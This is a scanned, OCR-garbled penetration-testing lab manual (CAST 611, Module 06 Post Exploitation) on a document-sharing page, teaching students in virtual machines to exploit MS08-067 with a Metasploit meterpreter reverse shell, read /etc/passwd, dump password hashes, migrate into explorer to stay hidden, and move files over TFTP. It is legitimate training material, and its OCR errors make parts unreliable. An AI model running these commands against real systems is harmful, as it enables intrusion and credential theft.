Open navigation menu
Close suggestions
Search
Search
en
Change Language
Upload
Sign in
Sign in
Download free for days
0 ratings
0% found this document useful (0 votes)
32 views
10 pages
In God We Trust3
Uploaded by
Aris Munandar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content,
claim it here
.
Available Formats
Download as PDF or read online on Scribd
Download
Save
Save In God We Trust3 For Later
0%
0% found this document useful, undefined
0%
, undefined
Embed
Share
Print
Report
0 ratings
0% found this document useful (0 votes)
32 views
10 pages
In God We Trust3
Uploaded by
Aris Munandar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content,
claim it here
.
Available Formats
Download as PDF or read online on Scribd
Carousel Previous
Carousel Next
Download
Save
Save In God We Trust3 For Later
0%
0% found this document useful, undefined
0%
, undefined
Embed
Share
Print
Report
Download now
Download
You are on page 1
/ 10
Search
Fullscreen
CAST 611 Lab Manual Post Exploitation Module 06“ejequieus ueyrued ynyny Jo Ado> jeuosied es SL Module 06. Post Exploitation Local Assessment In dhs exerci, once a target és exploited, what do we do nest? It is important to Jhave planed your past exphitation proves so itcan be done in a timely manner. —tsou KEY Lab Scenario Ey vauailc We wil exploit a erg, then perform addtional steps to pilfer more information. a Texyur Lab Objectives reve “The objective of this lab is to help students learn to identify vulnerabilities, link B Weboenie ‘an exploit with a vulnerability, review the exploit code, attempt w exploit a LI Werkiook review target, and finally perform additional steps to pilfer more information, ‘The tasks are as follows: Start a target machine (virtual machine} * Conduct the scancing methodology against the machine + identify vulnerabilities # Search for an exploit = Compile the exploit # Atempe to exploit the machine + Harvest information from un exploited machine = Gmb the password files, * Crick passwords + Transfer files or copy files to and from an exploited machine Lab Environment “To carryout this lab, you need: + Kali Linus = OWASP virtual machie idows 2003 virtual machine # Administrative/o0t privileges w run the tools CAST I Tab Masala 1 “vanced Poretation Testing Core © by ESOanl ATR: Reserved Reprochrion & Seely Poli *ejoquieus ueynued anyny Jo Ado> jeuosied © 51 sy“ejequieus ueyrued ynyny Jo Ado> jeuosied es SL Module 06. Post Exploitation Lab Duration “Time: 80 Minutes —Hitask 1 Lab Tasks Perform - Nmap sean eStart the Kali virtual machine. Once the machine boots up, login with a username root to elevate privileges, andl enter a password of toor. 2. The next thing we want to do is to start our OWASP and Server 2003 virtual machines, Once it starts up, do not login to the machine. We have to discover it. 3. The first ching we want todo is to scan the range with Nmap and see what we aan find. lea terminal window, enter nmap fn Pr -v-p- -TA 192.168.100.100,231. a. Weusea fragmented scan to make the scan harder @ detect, this is noted by the “P” option, b. ‘This scan will take a while to complete as it seins all ports; this is noted by the “p-” option. ae) serene Fg Nusa CAST Tab Maal Tage 7 Tavanca Poniron Testy Cope Ty BECO ATR: Reserved Reprochrion & Seely Poli *ejoquieus ueynued anyny Jo Ado> jeuosied © 51 sy“ejequieus ueyrued ynyny Jo Ado> jeuosied es SL Bi irasw 2 Start the OpenVAS Scanner Gras 3 Perform Scan Module 06. Post Exploitation 4, We have on more than one occasion, walked you through a aumber of methods to find the vulnerabilities, and then exploit it. Acthis point we will we our vulnerbility scanner tw sce what it finds, popukue your «rget database with the information received from the Nenap sean, and then we will c OpenVAS to scan for vulnerabilities on our machines. 5. Once thi seanner, compkted, we are ready for the next step to stat the Open VAS 6. Navigate to Applications | 2 -Vulnerability Analysis | openvas start 7. [Fall goes wall, we are now set up and ready. The next thing w do is «0 connect «© the tool via the web browser. Open an keewease! browser and enter httpsif427.0.0.1:9392. 8. When che login screen comes up, login with admin and a password of adminpw. ‘This shoull put you in the OpeiVAS interlace dashboard Grenbome Security Assistant 9. In the Quick start wizard, enter the IP address of the OWASP machine and dlick on Start Sean, ay SLL cme deat new set Inmaay sans adore Birask 4 Set Up a TFTP Server Figne| 2 OpenVASinkrce dstvad rnre Scty festart 10. By camining the scan ouput, you will come to know that most of the vulnerabilities are at a High rating, 11. Our intent here is for post exploittion, so we will gt the exploit now. We alreuly know we have the TikiWiki exploit to work with, so we will work with that one first. 12, The next thing we want t do is set upa ‘TFTP server on our Kali machine. We like © use TFTP since it is lightweight and many of our compromised machines will more than likely have a client ayaihble, ‘There are a number of FTP servers you can instill, we will use the atlipd server, Ip. terminal window, entcrapeget install atftpd, 13, This will download ard install the dtp package CAST GI Tab Masa Tage “vanced Ponctation Tesing Conve © by EES ATR: Reserved Reprochrion & Seely Poli *ejoquieus ueynued anyny Jo Ado> jeuosied © 51 sy“ejequieus ueyrued ynyny Jo Ado> jeuosied es SL Giras« 5 Bind the TFTP Server Birask 6 Pull the Module 06. Post Exploitation 14, We want to bind the TFIP server to our IP address of the Kali virtual machine, This will allow us to set up a TETP server that we can transfer files back and forth, 15, Einter atftpd daemon -port 69 —bind-address 192.168.100.200 tmp. \ sample of the output of this command can be found in Figure 1-3. le Edt View Searcn Terminal Help Fg tp stay 16. To verify the server started, enter netstat -anu | grep 69. This will present the ‘output similar to what is shown in Figure 1-4 Fe LATED sors 17. We now have a tftp server setup; this will handle virtually all of our required file transfers that we will need. We will now use the servers for our exploration into post exploitation. ‘The first thing we want to do is to pull the password file from the exploited machine, In. your shal from the target machine, enter cat etc/passwd. Note: This is a shell that we created in. Module 05 by explo machine. (Refer Module 05: Expbitation, Lab - 04, Figure 4-9). ing the target 18, Professional security testing, and especially exploitation is a process. Next, we are continuing on the panned step-by-step progression. We have access to the compromised machine, and how far we carry out the post exploitation depends on the amount of time we have and the scope of work within our assignment. This is the process, and it takes ime and resources, and sometimes it does fail. Your job as a professional tester is to write it up and produce the information in the delivery report. 19, Ok, wespent some time on the Linux machine, we will now shift our focus to the Windows machine. CAST OI Tah Masa Tage THT ‘vanced Penetration Testing Coparshr Ty B-COunell ATR: Reserved Reprochrion & Seely Poli *ejoquieus ueynued anyny Jo Ado> jeuosied © 51 syModule 06. Post Exploitation 21) Mor the Windows machine we will use the Metaspbit tool, because it has an TASK 7 advanced shell that we can use to perform a umber of local enumeration Start the steps. Start the Metasploit tool by entering, following in a terminal window. Metasploit Too! 1. service postgresql start b. _msfconsole Reena reine) Ieee gen ans Secs eee 7 “Trrasx se 21 Ifyou wanttostep through the methodology you can, but for the sake of time Exploit the wwe will exploit the MS-08.67 server service vulnerability. This is one of our ‘Target Machine most relizble exploits, so itis excelent ro use when you are trying for 100% exploitation success. Inthe Metasphit tool, enter use exploitwindows/smb/ms08 067 netapi We nest want to set the payload, since we want an advanced shell, we will use the meterpreter shall Enter set PAYLOAD windowsimoterpreter/reverse tcp. 25, We next want to enter the target, we can use the default target selection oF we can use the actual CAST GI Tab Masala ‘vanced Penetration Testing Coparshr Ty B-COunell AL Rights Reserved, Rec tion Sri FebModule 06. Post Exploitation 24, ‘The next thing, we do is set up the local host, so we enter set LHOST 192.168.100.200. 25. Now to set up the target machine, so we enter set RHOST 192.168.100.100, 26. We are now ready to try and exphoit the machine, so enter exploit 4. If all goes well, you should see something similar to that being shown in Figure 1-6. errrear rte? Figrel GFaphit wih nctpter “Trask a 28 Since we now have 2 meterpeter shall, we bave a lot of advanced things we Crack the can do, enter kashdump. This will dump the password hashes for the Password machine, all we have to do is to copy them and then save it to a file. An ‘exampk of this is shown in Figure 1-7 Serer Fg Sets towing pwede 29, We could now save the data and then import it into john the ripper and attempt to crack passwords, ‘CAST GATT Mal Tage TF Tavanca Poniron Testy Cope Ty BECO ATR: Reserved Reproduction & Sei Probie“ejequieus ueyrued ynyny Jo Ado> jeuosied es SL DirasK 10 Collect Additional Information Module 06. Post Exploitation 30. As you can see, the meterpreter shell has many advanced features. We will look at one more, and it is highly recommended that you explore this powwerful shell more on your own. 31, The next feature we will look at is the migrate feature. This allows us to migrate a process from the exploited one to another one. We often like to migrate to the Explorer process, because most users are not going to kill their ‘own desktop. When we exploit something there is a chance that the exploit will crash a process, so we can prevent Ising the exploit by migrating the code to another process. In your meterpreter shall, enter ps.’ This will display rocesses currently running on the target machine, a shown in Figure 1-8, Fog 14:7 coment pat 32. You can migrate to any process that you want, [ recommend that you migrate to the explorer process, and you do this by entering the command migrate
. 35. An example of a migrated process command is shown in Figure 1-9. Figrel-2 Seenha swiss gain CAST GI Tab Maal Tage TI ‘vanced Penetration Testing Coparshr Ty B-COunell ATR: Reserved Reprochrion & Seely Poli *ejoquieus ueynued anyny Jo Ado> jeuosied © 51 syModule 06. Post Exploitation 34. An important thing to remember is that no matter what OS you compromise you will have command level access, and more importantly local machine access. So your normal local techniques will be very effective, things to look for: 1. Open Ports b. Routing, c. Services 35, We ean also access a normal shell from the Metespreter shell, « do this enter the command shell Note: Manually Incate the path and type dir to list directory contents, ras Tas Seas aU aoa cat Fig 10: expel sin ices CAST GI Tab Masa Tage ‘vanced Penetration Testing Coparshr Ty B-COunell AL Rights Reserved, Rec tion Sri Feb“ejequieus ueyrued ynyny Jo Ado> jeuosied es SL Module 06. Post Exploitation 36, We could also background the session and exploit it apzis reason we like to find this vulnerability this is another 31. This concludes the exercise, close all windows, and suspend or shut down the virtual machines and dean up from the exercise. Lab Analysis After exploiting a machine, it is important that you plin for post exploitation activites, this involves a number of steps PLEASE TALK TO YOUR INSTRU RELATE! TOR IF YOU HAVE QUESTIONS D TO THIS LAB. eRe aB Se seed OYes No Platform Supported (Classroom Bilabs ab Mal gc 1 ‘RlvanasT Poctaton Feng Cori © Ty SS ATR: Reserved Reprochrion & Seely Poli *ejoquieus ueynued anyny Jo Ado> jeuosied © 51 sy
You might also like
Networking Manual by Bassterlord (Fisheye)
PDF
No ratings yet
Networking Manual by Bassterlord (Fisheye)
63 pages
Exploiting of Metasploit Machine Assessment Report: Assignment-3
PDF
No ratings yet
Exploiting of Metasploit Machine Assessment Report: Assignment-3
29 pages
Penetration Testing With Kali Linux (PWK)
PDF
67% (3)
Penetration Testing With Kali Linux (PWK)
6 pages
OSCP Training - 01
PDF
100% (3)
OSCP Training - 01
105 pages
12.4.1.2 Lab - Isolate Compromised Host Using 5-Tuple
PDF
100% (2)
12.4.1.2 Lab - Isolate Compromised Host Using 5-Tuple
18 pages
Lab+ +Hacking+Windows+XP+via+MS11 006+Windows+Shell+Graphics+Processing+
PDF
No ratings yet
Lab+ +Hacking+Windows+XP+via+MS11 006+Windows+Shell+Graphics+Processing+
13 pages
Verzeo November Major Project
PDF
No ratings yet
Verzeo November Major Project
72 pages
Lab 04.0 - VA & Exploitation
PDF
No ratings yet
Lab 04.0 - VA & Exploitation
10 pages
Practicals 3
PDF
No ratings yet
Practicals 3
5 pages
Windows_Targeting SMB
PDF
No ratings yet
Windows_Targeting SMB
6 pages
HW 5 - Metasploit Part 3 - Post Exploitation
PDF
No ratings yet
HW 5 - Metasploit Part 3 - Post Exploitation
11 pages
Lab 3 - Vulnerability Scanning and Exploitation Instructions_Mar 4
PDF
No ratings yet
Lab 3 - Vulnerability Scanning and Exploitation Instructions_Mar 4
5 pages
Lab - Exploring Endpoint Attacks: Requirements
PDF
No ratings yet
Lab - Exploring Endpoint Attacks: Requirements
16 pages
Lab Assignment 04
PDF
No ratings yet
Lab Assignment 04
17 pages
Gbenga Adewale 16023455 CC6051 Ethical Hacking
PDF
No ratings yet
Gbenga Adewale 16023455 CC6051 Ethical Hacking
16 pages
Lab 19 Metasploit
PDF
100% (1)
Lab 19 Metasploit
11 pages
Easy Mode
PDF
No ratings yet
Easy Mode
9 pages
Advanced Infrastructure Attacks - Final Project
PDF
No ratings yet
Advanced Infrastructure Attacks - Final Project
37 pages
Module06 System Hacking
PDF
No ratings yet
Module06 System Hacking
4 pages
LAB 1 - Scanning - & - Reconnaissance - V1.2
PDF
No ratings yet
LAB 1 - Scanning - & - Reconnaissance - V1.2
16 pages
LAB_Exploitation
PDF
No ratings yet
LAB_Exploitation
16 pages
Lect24&25_Exploit Using Metasploit
PDF
No ratings yet
Lect24&25_Exploit Using Metasploit
40 pages
Lab 05.0 - Post Exploitation
PDF
No ratings yet
Lab 05.0 - Post Exploitation
24 pages
Lab Exercises - XFSC-7021-MC1 - Network Security Kali Linux - 49070 - Online
PDF
No ratings yet
Lab Exercises - XFSC-7021-MC1 - Network Security Kali Linux - 49070 - Online
2 pages
ITN 261 Final Project
PDF
No ratings yet
ITN 261 Final Project
6 pages
EH_LAB_8 (1)
PDF
No ratings yet
EH_LAB_8 (1)
11 pages
HW 4 - Metasploit Payloads
PDF
No ratings yet
HW 4 - Metasploit Payloads
10 pages
Lab-18-Introducing VulnServer
PDF
No ratings yet
Lab-18-Introducing VulnServer
7 pages
Lab 1: Backdoor Attacks: Exercise 1: Exploiting Port 21: FTP
PDF
100% (1)
Lab 1: Backdoor Attacks: Exercise 1: Exploiting Port 21: FTP
4 pages
Lab - CTF Walkthrough - EVM 1
PDF
No ratings yet
Lab - CTF Walkthrough - EVM 1
10 pages
Sandworm APT Lab Instructions
PDF
No ratings yet
Sandworm APT Lab Instructions
12 pages
Lab - Isolated Compromised Host Using 5-Tuple
PDF
No ratings yet
Lab - Isolated Compromised Host Using 5-Tuple
33 pages
Lab - CTF - Basic Pentesting
PDF
No ratings yet
Lab - CTF - Basic Pentesting
12 pages
Vulnerabilities
PDF
No ratings yet
Vulnerabilities
17 pages
Ethical Hacking Project Work
PDF
No ratings yet
Ethical Hacking Project Work
16 pages
Hacking Into Windows 10 Using Metasploit Framework
PDF
No ratings yet
Hacking Into Windows 10 Using Metasploit Framework
13 pages
Lab5 VAPT
PDF
No ratings yet
Lab5 VAPT
14 pages
22MCAR0033 CF Activity2
PDF
No ratings yet
22MCAR0033 CF Activity2
11 pages
Lab
PDF
No ratings yet
Lab
20 pages
Basic Pentesting
PDF
No ratings yet
Basic Pentesting
11 pages
Enumerating Linux Users and Groups
PDF
No ratings yet
Enumerating Linux Users and Groups
6 pages
Uy_Charles_LAB12 - Isolate Compromised Host Using 5-Tuple
PDF
No ratings yet
Uy_Charles_LAB12 - Isolate Compromised Host Using 5-Tuple
20 pages
Metasploit MS08-067
PDF
No ratings yet
Metasploit MS08-067
32 pages
12 - 4 - 1 - 2 Lab Isolate Compromised Host Using 5-Tuple
PDF
100% (1)
12 - 4 - 1 - 2 Lab Isolate Compromised Host Using 5-Tuple
21 pages
360CybersecurityCompendium_hakin9_ebook-1
PDF
No ratings yet
360CybersecurityCompendium_hakin9_ebook-1
154 pages
Labe4 - Exploit W7 PC (Bajado de Int)
PDF
No ratings yet
Labe4 - Exploit W7 PC (Bajado de Int)
14 pages
Lab - Isolated Compromised Host Using 5-Tuple: Topology
PDF
No ratings yet
Lab - Isolated Compromised Host Using 5-Tuple: Topology
19 pages
12.4.1.2 Lab - Isolate Compromised Host Using 5-Tuple
PDF
No ratings yet
12.4.1.2 Lab - Isolate Compromised Host Using 5-Tuple
18 pages
Exploiting With It
PDF
No ratings yet
Exploiting With It
11 pages
Hacking Metasploit2
PDF
No ratings yet
Hacking Metasploit2
32 pages
Lab - CTF - Stapler
PDF
No ratings yet
Lab - CTF - Stapler
31 pages
BhaveshJakhar 500087897 B4 Lab8
PDF
No ratings yet
BhaveshJakhar 500087897 B4 Lab8
6 pages
Armitage Introduction Lab
PDF
No ratings yet
Armitage Introduction Lab
19 pages
Metasploitable Exploits and Hardening Guide
PDF
No ratings yet
Metasploitable Exploits and Hardening Guide
10 pages
Penetration Testing Report
PDF
No ratings yet
Penetration Testing Report
12 pages
23E05-ST#IS#6532 TASK-04
PDF
No ratings yet
23E05-ST#IS#6532 TASK-04
24 pages
Lab 5.1- VNC Session_system hacking
PDF
No ratings yet
Lab 5.1- VNC Session_system hacking
10 pages
WIN10 MetaExplot
PDF
No ratings yet
WIN10 MetaExplot
12 pages
Task 2 in Cyber Security
PDF
No ratings yet
Task 2 in Cyber Security
6 pages